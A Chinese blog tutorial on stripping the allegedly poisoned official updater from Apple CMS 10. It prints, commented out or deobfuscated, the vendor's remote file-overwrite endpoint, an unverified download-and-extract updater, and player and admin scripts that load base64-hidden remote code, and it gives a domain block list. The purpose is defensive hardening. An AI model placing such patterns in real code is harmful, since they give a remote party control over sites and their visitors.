AI摘要
本文详细介绍了如何从苹果cms10中去除官方更新,以应对官方更新通道可能存在的安全风险。主要步骤包括:从GitHub下载源代码,批量替换官方域名为空或自定义域名,注释掉`Update.php`和`Safety.php`中的更新后门代码,移除播放器文件中的广告链接,以及注释掉多个JavaScript文件中的更新检测和请求代码。此外,还建议在服务器层面屏蔽官方域名,以彻底杜绝潜在的安全隐患。
苹果cms10 去除官方更新
根据奇安信实锤,基本上可以确认是官方更新通道投毒
https://mp.weixin.qq.com/s/nl_Pntpoys9NVBp7RKLJvg
1.下载源代码
从github中下载源代码。一般来说后门不会直接写在github上,而是在安装之后通过自动更新加入到代码中,所以此时的github代码可以认为是安全的。不过这只是推断:下载后最好固定到某个具体的提交或发布版本,并用下文列出的域名和base64字符串在全部文件中搜索一遍,确认没有遗漏再部署。
2.批量替换域名(关键)
使用代码编辑器,批量替换代码中的域名。此处我以自己网站的域名代替,即使替换后有些请求会失败,也好过继续请求官方域名。注意:替换后代码里会出现指向自己域名下子域名的地址(例如下文的 update.000081.xyz),要确认这些子域名没有解析到不受自己控制的地址,否则只是把信任对象换了一个。
union.maccms.la => 所有带有该域名的链接全部改为空
maccms.la => 替换成自己的域名
aHR0cDovL3VwZGF0ZS5tYWNjbXMubGEv => 该字符串为更新域名的base64编码,替换为空,有两处地方要修改。
application/admin/controller/Update.php
application/admin/controller/Safety.php
3.注释更新后门文件(关键)
文件路径:application/admin/controller/Update.php
<?php
namespace app\admin\controller;
use think\Db;
use app\common\util\PclZip;
class Update extends Base
{
var $_url;
var $_save_path;
/**
 * Initialise the updater's remote base URL and local staging directory.
 *
 * The literal passed to base64_decode() is empty here, so $_url evaluates to
 * the relative string "v10/" and does not name any remote host.
 */
public function __construct()
{
    parent::__construct();
    //header('X-Accel-Buffering: no');
    $this->_save_path = './application/data/update/';
    $this->_url = base64_decode("") . "v10/";
}
/**
 * Render the template registered as 'admin@test/index'.
 *
 * @return mixed Whatever the inherited fetch() produces for that template.
 */
public function index()
{
    $rendered = $this->fetch('admin@test/index');

    return $rendered;
}
/**
 * Step 1 of the online updater: download and unpack an update archive (disabled).
 *
 * The whole body is commented out, so this action does nothing and returns no
 * value. The disabled code built "<$_url><$file>.zip", fetched it with
 * mac_curl_get(), saved it under $_save_path and extracted it with PclZip using
 * an empty PCLZIP_OPT_PATH together with PCLZIP_OPT_REPLACE_NEWER. Nothing
 * between the download and the extract() call checks a hash or a signature, so
 * the archive was trusted only because of the host it came from.
 *
 * @param string $file Archive base name; presumably bound from the request's
 *                     `file` parameter (confirm against the router). Unused
 *                     while the body stays disabled.
 */
public function step1($file='')
{
// --- disabled: parameter check and remote URL construction ---
// if(empty($file)){
// return $this->error(lang('param_err'));
// }
// $version = config('version.code');
// $url = $this->_url .$file . '.zip?t='.time();
// echo $this->fetch('admin@public/head');
// echo "<div class='update'><h1>".lang('admin/update/step1_a')."</h1><textarea rows=\"25\" class='layui-textarea' readonly>".lang('admin/update/step1_b')."\n";
// ob_flush();flush();
// sleep(1);
// --- disabled: download the archive and write it to the staging directory ---
// $save_file = $version.'.zip';
// $html = mac_curl_get($url);
// @fwrite(@fopen($this->_save_path.$save_file,'wb'),$html);
// if(!is_file($this->_save_path.$save_file)){
// echo lang('admin/update/download_err')."\n";
// exit;
// }
// if(filesize($this->_save_path.$save_file) <1){
// @unlink($this->_save_path.$save_file);
// echo lang('admin/update/download_err')."\n";
// exit;
// }
// echo lang('admin/update/download_ok')."\n";
// echo lang('admin/update/upgrade_package_processed')."\n";
// ob_flush();flush();
// sleep(1);
// --- disabled: extract the archive, replacing newer files, with no integrity check ---
// $archive = new PclZip();
// $archive->PclZip($this->_save_path.$save_file);
// if(!$archive->extract(PCLZIP_OPT_PATH, '', PCLZIP_OPT_REPLACE_NEWER)) {
// echo $archive->error_string."\n";
// echo lang('admin/update/upgrade_err').'' ."\n";;
// exit;
// }
// else{
// }
// @unlink($this->_save_path.$save_file);
// echo '</textarea></div>';
// mac_jump( url('update/step2',['jump'=>1]) ,3);
}
/**
 * Step 2 of the online updater: apply the SQL shipped with an update (disabled).
 *
 * The whole body is commented out, so this action is a no-op. The disabled code
 * looked for $_save_path . 'database.php' and pulled it in with @include, which
 * means any PHP in that file ran inside the admin process. It then took the
 * $sql variable (apparently set by the included file), split it with
 * mac_parse_sql() and passed every statement to Db::execute(), printing
 * success or fail per statement and carrying on after a failure.
 */
public function step2()
{
// $version = config('version.code');
// $save_file = 'database.php';
// echo $this->fetch('admin@public/head');
// echo "<div class='update'><h1>".lang('admin/update/step2_a')."</h1><textarea rows=\"25\" class='layui-textarea' readonly>\n";
// ob_flush();flush();
// sleep(1);
// $res=true;
// // Import SQL
// $sql_file = $this->_save_path .$save_file;
// if (is_file($sql_file)) {
// echo lang('admin/update/upgrade_sql')."\n";
// ob_flush();flush();
// $pre = config('database.prefix');
// $schema = Db::query('select * from information_schema.columns where table_schema = ?',[ config('database.database') ]);
// $col_list = [];
// $sql='';
// foreach($schema as $k=>$v){
// $col_list[$v['TABLE_NAME']][$v['COLUMN_NAME']] = $v;
// }
// --- disabled: executes the PHP file that arrived in the update package ---
// @include $sql_file;
// //dump($sql);die;
// /*
// //$html = @file_get_contents($sql_file);
// //$sql = mac_get_body($html,'--'.$version.'-start--','--'.$version.'-end--');
// $sql = @file_get_contents($sql_file);
// */
// --- disabled: runs each parsed statement against the site database ---
// if(!empty($sql)) {
// $sql_list = mac_parse_sql($sql, 0, ['mac_' => $pre]);
// if ($sql_list) {
// $sql_list = array_filter($sql_list);
// foreach ($sql_list as $v) {
// echo $v;
// try {
// Db::execute($v);
// echo " ---".lang('success')."\n\n";
// } catch (\Exception $e) {
// echo " ---".lang('fail')."\n\n";
// }
// ob_flush();flush();
// }
// }
// }
// else{
// }
// @unlink($sql_file);
// }
// else{
// echo lang('admin/update/no_sql')."\n";
// }
// echo '</textarea></div>';
// mac_jump(url('update/step3', ['jump' => 1]), 3);
}
/**
 * Step 3 of the online updater: clear caches and report completion (disabled).
 *
 * The whole body is commented out, so this action is a no-op. The disabled code
 * called $this->_cache_clear(), printed the completion messages and showed a
 * warning when $_save_path . 'database.php' was still present on disk.
 */
public function step3()
{
// echo $this->fetch('admin@public/head');
// echo "<div class='update'><h1>".lang('admin/update/step3_a')."</h1><div rows=\"25\" class='layui-textarea' readonly>\n";
// ob_flush();flush();
// sleep(1);
// $this->_cache_clear();
// echo lang('admin/update/update_cache')."<br>";
// echo lang('admin/update/upgrade_complete')."<br>";
// if(is_file($this->_save_path . 'database.php')){
// echo "<strong style='color: red;'>" . lang('admin/update/not_delete') . ":application/data/update/database.php</strong>";
// }
// ob_flush();flush();
// echo '</div></div>';
}
/**
 * Remote single-file overwrite endpoint (disabled); now only ends the request.
 *
 * The disabled code read the request parameters a, b, c and d, fetched
 * "<decoded base URL><a>/<b>" with mac_curl_get() and, when the response
 * contained the marker cbfc17ea5c504aa1a6da788516ae5a4c (and also $d, when $d
 * was given), wrote the response over the local file named by $b whenever
 * intval($c) differed from that file's current size; 'admin.php' was mapped to
 * IN_FILE first. Both the target path and the written content came from outside
 * the application, with no check on either.
 *
 * The marker string above is a practical search term when auditing an install
 * that has already run the official updater.
 */
public function one()
{
// $param = input();
// $a = $param['a'];
// $b = $param['b'];
// $c = $param['c'];
// $d = $param['d'];
// $e = mac_curl_get( base64_decode("") . $a."/".$b);
// if (stripos($e, 'cbfc17ea5c504aa1a6da788516ae5a4c') !== false) {
// if (($d!="") && strpos(",".$e,$d) <=0){ return; }
// if($b=='admin.php'){$b=IN_FILE;}
// $f = is_file($b) ? filesize($b) : 0;
// if (intval($c)<>intval($f)) { @fwrite(@fopen( $b,"wb"),$e); }
// }
// The only live statement: stop the request without producing output.
die;
}
}
4.播放器文件去除广告链接(关键)
文件路径:static/js/player.js
文件路径:static_new/js/player.js
该播放器文件代码已混淆,解密后发现官方在非Windows/Mac平台(主要是手机端)引入
//union.maccms.la/html/top10.js
从而有概率跳转广告
解密后文件如下
// Install a window.onerror handler that always returns true. Returning true
// from onerror marks the error as handled, so script errors on any page that
// loads this file are not reported in the usual way.
var killErrors = function(value) {
return true
};
window.onerror = null;
window.onerror = killErrors;
// Base64 alphabet used by base64encode(); position in the string is the 6-bit value.
var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
// Reverse table used by base64decode(): indexed by character code, holding the
// 6-bit value of that character or -1 when it is not part of the alphabet.
var base64DecodeChars = new Array(-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
/**
 * Encode a string of byte-valued characters as base64 with '=' padding.
 *
 * Input is consumed three characters at a time; a trailing group of one or two
 * characters is emitted with "==" or "=" respectively.
 */
function base64encode(str) {
    var alphabet = base64EncodeChars;
    var total = str.length;
    var pos = 0;
    var encoded = "";
    var first, second, third;
    while (pos < total) {
        first = str.charCodeAt(pos++) & 0xff;
        if (pos == total) {
            // Only one character left in the final group.
            encoded += alphabet.charAt(first >> 2)
                + alphabet.charAt((first & 0x3) << 4)
                + "==";
            break;
        }
        second = str.charCodeAt(pos++);
        if (pos == total) {
            // Two characters left in the final group.
            encoded += alphabet.charAt(first >> 2)
                + alphabet.charAt(((first & 0x3) << 4) | ((second & 0xF0) >> 4))
                + alphabet.charAt((second & 0xF) << 2)
                + "=";
            break;
        }
        third = str.charCodeAt(pos++);
        encoded += alphabet.charAt(first >> 2)
            + alphabet.charAt(((first & 0x3) << 4) | ((second & 0xF0) >> 4))
            + alphabet.charAt(((second & 0xF) << 2) | ((third & 0xC0) >> 6))
            + alphabet.charAt(third & 0x3F);
    }
    return encoded;
}
/**
 * Decode a base64 string into a string of byte-valued characters.
 *
 * Characters that map to -1 in base64DecodeChars are skipped. Decoding stops at
 * the first '=' (character code 61) found in the third or fourth position of a
 * group, or when the input runs out. This is the routine the obfuscated player
 * used to hide the remote script URL from a plain-text search.
 */
function base64decode(str) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while (i < len) {
// First symbol of the group: skip anything outside the alphabet.
do {
c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff]
} while (i < len && c1 == -1);
if (c1 == -1) break;
// Second symbol; together with the first it yields the first output byte.
do {
c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff]
} while (i < len && c2 == -1);
if (c2 == -1) break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
// Third symbol; 61 is '=' and ends the decode.
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61) return out;
c3 = base64DecodeChars[c3]
} while (i < len && c3 == -1);
if (c3 == -1) break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
// Fourth symbol; again '=' ends the decode.
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61) return out;
c4 = base64DecodeChars[c4]
} while (i < len && c4 == -1);
if (c4 == -1) break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4)
}
return out
}
/**
 * Re-encode each UTF-16 code unit of `str` as one, two or three byte-valued
 * characters using the UTF-8 bit layout.
 *
 * Code units 0x0001-0x007F pass through unchanged, code units above 0x07FF
 * become three characters, and everything else (including 0x0000) becomes two.
 */
function utf16to8(str) {
    var pieces = [];
    var total = str.length;
    for (var idx = 0; idx < total; idx++) {
        var code = str.charCodeAt(idx);
        if (code > 0x07FF) {
            pieces.push(String.fromCharCode(
                0xE0 | ((code >> 12) & 0x0F),
                0x80 | ((code >> 6) & 0x3F),
                0x80 | ((code >> 0) & 0x3F)
            ));
        } else if (code >= 0x0001 && code <= 0x007F) {
            pieces.push(str.charAt(idx));
        } else {
            pieces.push(String.fromCharCode(
                0xC0 | ((code >> 6) & 0x1F),
                0x80 | ((code >> 0) & 0x3F)
            ));
        }
    }
    return pieces.join("");
}
/**
 * Rebuild UTF-16 code units from a string of byte-valued characters laid out
 * as UTF-8.
 *
 * The high nibble of each lead character selects the sequence length: 0-7 is a
 * single character, 12-13 starts a two-character sequence and 14 a
 * three-character sequence. Any other lead character is dropped.
 */
function utf8to16(str) {
    var total = str.length;
    var pos = 0;
    var decoded = "";
    var lead, second, third, highNibble;
    while (pos < total) {
        lead = str.charCodeAt(pos++);
        highNibble = lead >> 4;
        if (highNibble <= 7) {
            decoded += str.charAt(pos - 1);
        } else if (highNibble === 12 || highNibble === 13) {
            second = str.charCodeAt(pos++);
            decoded += String.fromCharCode(((lead & 0x1F) << 6) | (second & 0x3F));
        } else if (highNibble === 14) {
            second = str.charCodeAt(pos++);
            third = str.charCodeAt(pos++);
            decoded += String.fromCharCode(
                ((lead & 0x0F) << 12) | ((second & 0x3F) << 6) | ((third & 0x3F) << 0)
            );
        }
    }
    return decoded;
}
var MacPlayer = {
// Format date `t` (default: now) by substituting tokens in pattern `f`.
// The replacements run in a fixed order, longer tokens before shorter ones, so
// the statement order below matters.
// NOTE(review): getMonth() is zero-based and is used without +1, so MM/M give a
// value one lower than the calendar month; getYear() is a legacy accessor.
// Confirm whether any caller depends on the current output before changing it.
'GetDate': function(f, t) {
if (!t) {
t = new Date()
}
// Chinese weekday names, indexed by getDay() (0 = Sunday).
var a = ['日', '一', '二', '三', '四', '五', '六'];
f = f.replace(/yyyy|YYYY/, t.getFullYear());
f = f.replace(/yy|YY/, (t.getYear() % 100) > 9 ? (t.getYear() % 100).toString() : '0' + (t.getYear() % 100));
f = f.replace(/MM/, t.getMonth() > 9 ? t.getMonth().toString() : '0' + t.getMonth());
f = f.replace(/M/g, t.getMonth());
f = f.replace(/w|W/g, a[t.getDay()]);
f = f.replace(/dd|DD/, t.getDate() > 9 ? t.getDate().toString() : '0' + t.getDate());
f = f.replace(/d|D/g, t.getDate());
f = f.replace(/hh|HH/, t.getHours() > 9 ? t.getHours().toString() : '0' + t.getHours());
f = f.replace(/h|H/g, t.getHours());
f = f.replace(/mm/, t.getMinutes() > 9 ? t.getMinutes().toString() : '0' + t.getMinutes());
f = f.replace(/m/g, t.getMinutes());
f = f.replace(/ss|SS/, t.getSeconds() > 9 ? t.getSeconds().toString() : '0' + t.getSeconds());
f = f.replace(/s|S/g, t.getSeconds());
return f
},
// Fill the link template: the first two '{sid}' placeholders with `s`, then the
// first two '{nid}' placeholders with `n`.
'GetUrl': function(s, n) {
    var link = this.Link;
    link = link.replace('{sid}', s).replace('{sid}', s);
    link = link.replace('{nid}', n).replace('{nid}', n);
    return link
},
// Navigate the current window to the link built for source `s` and episode `n`.
'Go': function(s, n) {
    var target = this.GetUrl(s, n);
    location.href = target
},
// Show the pre-roll frame, schedule AdsEnd() after `Second` seconds and write
// the player markup into #playleft.
// NOTE(review): this.Html is assigned outside this file and goes straight into
// innerHTML; confirm it is produced only by the site's own player scripts.
'Show': function() {
$('#buffer').attr('src', this.Prestrain);
setTimeout(function() {
MacPlayer.AdsEnd()
}, this.Second * 1000);
$("#playleft").get(0).innerHTML = this.Html + '';
// Vendor-added script injection, disabled. It ran only when navigator.platform
// matched neither "Win" nor "Mac", so it never fired in a desktop Windows or
// macOS browser. The script URL was kept base64-encoded, which hides the host
// name from a plain-text search of the file, and a date-based query string was
// appended to it.
// if (!/(Win|Mac)/i.test(navigator.platform)) {
// var a = document.createElement('script');
// a.type = 'text/javascript';
// a.async = true;
// a.charset = 'utf-8';
// a.src = base64decode('Ly91bmlvbi5tYWNjbXMubGEvaHRtbC90b3AxMC5qcw==') + '?r=' + this.GetDate('yyyyMMdd');
// var b = document.getElementsByTagName('script')[0];
// b.parentNode.insertBefore(a, b)
// }
},
// Point the #buffer frame at the buffering page (only if it is not already
// there) and make it visible.
'AdsStart': function() {
    var frame = $("#buffer");
    var wanted = this.Buffer;
    if (frame.attr('src') != wanted) {
        frame.attr('src', wanted)
    }
    frame.show()
},
// Hide the #buffer frame again.
'AdsEnd': function() {
    var frame = $('#buffer');
    frame.hide()
},
// Mark the player as not ready and reveal the #install frame.
'Install': function() {
    var installFrame = $('#install');
    this.Status = false;
    installFrame.show()
},
// Write the player container (two overlay iframes plus the #playleft cell) into
// the document, record its rendered size, then load the per-source player
// script from this.Path + this.PlayFrom + '.js'.
// NOTE(review): this.Width, this.Height and this.PlayFrom are concatenated into
// the written markup without escaping; Init() takes them from MacPlayerConfig
// and player_aaaa. Confirm those values can only be set by the site operator.
'Play': function() {
document.write('<style>.MacPlayer{background: #000000;font-size:14px;color:#F6F6F6;margin:0px;padding:0px;position:relative;overflow:hidden;width:' + this.Width + ';height:' + this.Height + ';min-height:100px;}.MacPlayer table{width:100%;height:100%;}.MacPlayer #playleft{position:inherit;!important;width:100%;height:100%;}</style><div class="MacPlayer">' + '<iframe id="buffer" src="" frameBorder="0" scrolling="no" width="100%" height="100%" style="position:absolute;z-index:99998;"></iframe><iframe id="install" src="" frameBorder="0" scrolling="no" width="100%" height="100%" style="position:absolute;z-index:99998;display:none;"></iframe>' + '<table border="0" cellpadding="0" cellspacing="0"><tr><td id="playleft" valign="top" style=""> </td></table></div>');
this.offsetHeight = $('.MacPlayer').get(0).offsetHeight;
this.offsetWidth = $('.MacPlayer').get(0).offsetWidth;
document.write('<scr' + 'ipt src="' + this.Path + this.PlayFrom + '.js"></scr' + 'ipt>')
},
// Handler for the "down" flag; intentionally empty in this file.
'Down': function() {},
// Read the page-level player data (player_aaaa) and site configuration
// (MacPlayerConfig), copy them onto MacPlayer, then start Play() or Down().
'Init': function() {
this.Status = true;
this.Parse = '';
var a = player_aaaa;
// encrypt == '1': URLs are escape()-encoded; encrypt == '2': base64, then escape()-encoded.
if (a.encrypt == '1') {
a.url = unescape(a.url);
a.url_next = unescape(a.url_next)
} else if (a.encrypt == '2') {
a.url = unescape(base64decode(a.url));
a.url_next = unescape(base64decode(a.url_next))
}
this.Agent = navigator.userAgent.toLowerCase();
this.Width = MacPlayerConfig.width;
this.Height = MacPlayerConfig.height;
// Switch to the mobile dimensions when the user agent looks like a phone or tablet.
if (this.Agent.indexOf("android") > 0 || this.Agent.indexOf("mobile") > 0 || this.Agent.indexOf("ipod") > 0 || this.Agent.indexOf("ios") > 0 || this.Agent.indexOf("iphone") > 0 || this.Agent.indexOf("ipad") > 0) {
this.Width = MacPlayerConfig.widthmob;
this.Height = MacPlayerConfig.heightmob
}
// Dimensions without a "px" or "%" unit fall back to 100%.
if (this.Width.indexOf("px") == -1 && this.Width.indexOf("%") == -1) {
this.Width = '100%'
}
if (this.Height.indexOf("px") == -1 && this.Height.indexOf("%") == -1) {
this.Height = '100%'
}
this.Prestrain = MacPlayerConfig.prestrain;
this.Buffer = MacPlayerConfig.buffer;
this.Second = MacPlayerConfig.second;
this.Flag = a.flag;
this.Trysee = a.trysee;
this.Points = a.points;
this.Link = decodeURIComponent(a.link);
// PlayFrom later becomes part of a script URL in Play().
this.PlayFrom = a.from;
this.PlayNote = a.note;
this.PlayServer = a.server == 'no' ? '' : a.server;
this.PlayUrl = a.url;
this.PlayUrlNext = a.url_next;
this.PlayLinkNext = a.link_next;
this.PlayLinkPre = a.link_pre;
this.Id = a.id;
this.Sid = a.sid;
this.Nid = a.nid;
// Replace a configured server key with that server's `des` value.
if (MacPlayerConfig.server_list[this.PlayServer] != undefined) {
this.PlayServer = MacPlayerConfig.server_list[this.PlayServer].des
}
// Sources flagged ps == "1" go through the generic 'parse' player, using the
// source's own parse URL when it has one and the global one otherwise.
if (MacPlayerConfig.player_list[this.PlayFrom] != undefined) {
if (MacPlayerConfig.player_list[this.PlayFrom].ps == "1") {
this.Parse = MacPlayerConfig.player_list[this.PlayFrom].parse == '' ? MacPlayerConfig.parse : MacPlayerConfig.player_list[this.PlayFrom].parse;
this.PlayFrom = 'parse'
}
}
this.Path = maccms.path + '/static/player/';
if (this.Flag == "down") {
MacPlayer.Down()
} else {
MacPlayer.Play()
}
}
};
MacPlayer.Init();
5.注释更新JavaScript文件
文件路径:static_new/js/update.js
// String.prototype.replaceAll = function (FindText, RepText) {
// regExp = new RegExp(FindText, "g");
// return this.replace(regExp, RepText);
// }
// function getQS(par, name) {
// var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
// var r = par.substr(1).match(reg);
// if (r != null) return unescape(r[2]); return null;
// }
// function msck(n, v) { var exp = new Date(); exp.setTime(exp.getTime() + 30 * 60 * 1000); document.cookie = n + "=" + escape(v) + ";path=/;expires=" + exp.toGMTString() }
// function mgck(n) { var arr, reg = new RegExp("(^| )" + n + "=([^;]*)(;|$)"); if (arr = document.cookie.match(reg)) return unescape(arr[2]); else return null }
// var new_v = '2024.1000.4044';
// var update_content = [
// '<strong>v2024.1000.4044 更新内容:</strong>',
// '1,优化重名检测卡顿问题。',
// '2,入库重复规移除名称必选和新增豆瓣id。',
// '3,修正帐号无法登出问题。',
// '4,其他细节优化。',
// ].join('<br>');
// var package = 'maccms10_update';
// var domain = 'update.000081.xyz/';
// var params = window.location.search;
// var scripts = document.getElementsByTagName('script');
// for (i = 0; i < scripts.length; i++) {
// var lastUrl = scripts[i].src;
// if (lastUrl.indexOf(domain) > -1) {
// params = lastUrl.substr(lastUrl.indexOf('?'));
// }
// }
// var de = new Date(), mh = de.getMonth() + 1, da = de.getDate(), rr = mh + "" + da;
// var c = getQS(params, 'c');
// var v = getQS(params, 'v');
// var p = getQS(params, 'p');
// var tp = getQS(params, 'tp');
// var v1 = v.replace(/\./g, "");
// var v2 = new_v.replace(/\./g, "");
// var html = '';
// if (v2 > v1) {
// html += `<table class="tbinfo pleft layui-table" >
// <thead>
// <th colspan="4">
// 更新提示【${new_v}】>>>
// <a target="_blank" href="https://t.me/maccms_channel">Telegram群https://t.me/maccms_channel</a>
//
// <a target="_blank" href="https://github.com/magicblack">Github源码https://github.com/magicblack</a>
// </th>
// </thead>
// <tr>
// <td colspan="4">
// <font class="tif s20" style="display: none;">
// 警告,补丁包【${new_v}】发布,修复安全漏洞和更新服务,请及时升级相应补丁!
// </font>
// <a class="j-iframe" title="点击进入升级" data-href="${ADMIN_PATH}/admin/update/step1.html?file=${package}">
// <font class="tit s20">【点击进入在线升级】</font>
// </a>
// <a href="https://github.com/magicblack/maccms_down/raw/master/maccms10_update.zip">
// <font class="tit s20">【下载离线升级包线路1】</font>
// </a>
// <a href="https://cdn.jsdelivr.net/gh/magicblack/maccms_down@master/maccms10_update.zip">
// <font class="tit s20">【下载离线升级包线路2】</font>
// </a>
// </td>
// </tr>
// <tr>
// <td colspan="4">${update_content}</td>
// </tr>
// </table>`;
// }
// else {
// html += `<table class="tbinfo pleft layui-table" >
// <thead>
// <th colspan="4">
// 更新提示>>>
// <a target="_blank" href="https://t.me/maccms_channel">Telegram群https://t.me/maccms_channel</a>
//
// <a target="_blank" href="https://github.com/magicblack">Github源码https://github.com/magicblack</a>
// </th>
// </thead>
// <tr>
// <td colspan="4"><font class="tit s20">当前是最新版本!</font></td>
// </tr>
// </table>`;
// }
// if (tp != null) {
// var v3 = tp.replace(/\./g, "");
// if (v3 < 5024) {
// html += `<table class="tbinfo pleft layui-table" >
// <thead>
// <th colspan="4">ThinkPHP框架更新提示</th>
// </thead>
// <tr>
// <td colspan="4">
// <font class="tif s20">警告:ThinkPHP5.0.24版本发布安全更新,建议更新框架以免造成不必要的损失,下载后直接覆盖到网站根目录即可!</font>
// <a href="https://cdn.jsdelivr.net/gh/magicblack/maccms_down@master/%E4%B8%93%E7%94%A8thinkphp%205.0.24.zip">
// <font class="tit s20">【点击下载框架升级包】</font>
// </a>
// </td>
// </tr>
// </table>`;
// }
// }
// $("body").append("<style>.tit{color:blue;} .tif{color:red;} .s20{font-size:20px;} </style>");
// $("table:last").after(html);
6.注释index.html下的ajax更新请求
文件路径:application/admin/view_new/index/index.html
var layer;
layui.use(['element', 'layer', 'form'], function () {
var $ = layui.jquery, element = layui.element, form = layui.form;
layer = layui.layer;
console.log("MAC_VERSION", MAC_VERSION)
// if (typeof (MAC_VERSION) != 'undefined' && typeof (PHP_VERSION) != 'undefined' && typeof (THINK_VERSION) != 'undefined') {
// $.ajax({
// url: `https://update.000081.xyz/v10/?c=check&v=${MAC_VERSION}&p=${PHP_VERSION}&tp=${THINK_VERSION}&t=${Math.random()}`,
// type: 'GET',
// dataType: 'text', // 确保返回的数据被视为纯文本
// success: function (response) {
// // 使用正则表达式提取update_content
// // var updateContentRegex = /var update_content = \[((?:.|\n)*?)\].join\('<br>\');/g;
// var updateContentMatch = response.match(/var update_content\s*=\s*\[(.*?)\]\.join\('<br>'\);/s);
// console.log("updateContentMatch", updateContentMatch)
// if (updateContentMatch){
// eval(updateContentMatch[0])
// }
// // 使用正则表达式提取new_v
// var newVRegex = /var new_v = '(.*?)';/;
// var newVMatch = response.match(newVRegex);
// var newV = newVMatch ? newVMatch[1] : '未找到new_v';
// if (newV > MAC_VERSION) {
// // 存储更新信息到全局变量,供showUpdateDialog函数使用
// window.updateInfo = {
// newV: newV,
// update_content: update_content,
// package: 'maccms10_update'
// };
// // 显示更新按钮而不是直接弹窗(在两个位置都显示)
// $('.layout-right #update-notification').show().addClass('show');
// $('.bottom-nav #update-notification').show().addClass('show');
// }
// },
// error: function (xhr, status, error) {
// console.error('AJAX请求失败:', error);
// }
// });
// }
// layer.msg('提示信息', { time: 180000 });
element.init('nav', 'demo');
// 重新渲染select,将下拉弹层插入到body
form.render('select', {
render: true
});
7.注释检测更新文件
文件路径:static/js/admin_common.js
第19行
$(function(){
if( typeof(MAC_VERSION) !='undefined' && typeof(PHP_VERSION) !='undefined' && typeof(THINK_VERSION) !='undefined' ) {
// eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(\'3\').9(\'<0\'+\'1 4="\'+\'//5.6.7/8/?c=2&a=\'+b+\'&d=\'+e+\'&f=\'+g+\'&h=\'+i.j()+\'"></0\'+\'1>\');',20,20,'scr|ipt|check|body|src|update|maccms|la|v10|append|v|MAC_VERSION||p|PHP_VERSION|tp|THINK_VERSION|t|Math|random'.split('|'),0,{}));
}
});
该混淆解码后内容如下
$('body').append('<script src="//update.maccms.la/v10/?c=check&a=' + MAC_VERSION + '&p=' + PHP_VERSION + '&tp=' + THINK_VERSION + '&t=' + Math.random() + '"></script>');
8.屏蔽maccms.la域名,可选操作
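在服务器上屏蔽官方域名,防止其他没改到的地方继续更新。注意这一步只能拦住服务器端(PHP)发起的请求;player.js、admin_common.js 里的脚本是由访问者或管理员的浏览器直接加载的,服务器端屏蔽对它们无效,所以前面几步的代码修改不能省略。浏览器一侧可以再加一层 Content-Security-Policy 的 script-src 限制作为兜底。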
maccms.la
*.maccms.la
提供已去除更新程序
提供的程序已按照上述流程去除更新,只需要将000081.xyz自行替换为自己的域名。使用前建议与GitHub上的原始代码做一次diff,确认改动只有上文列出的这些。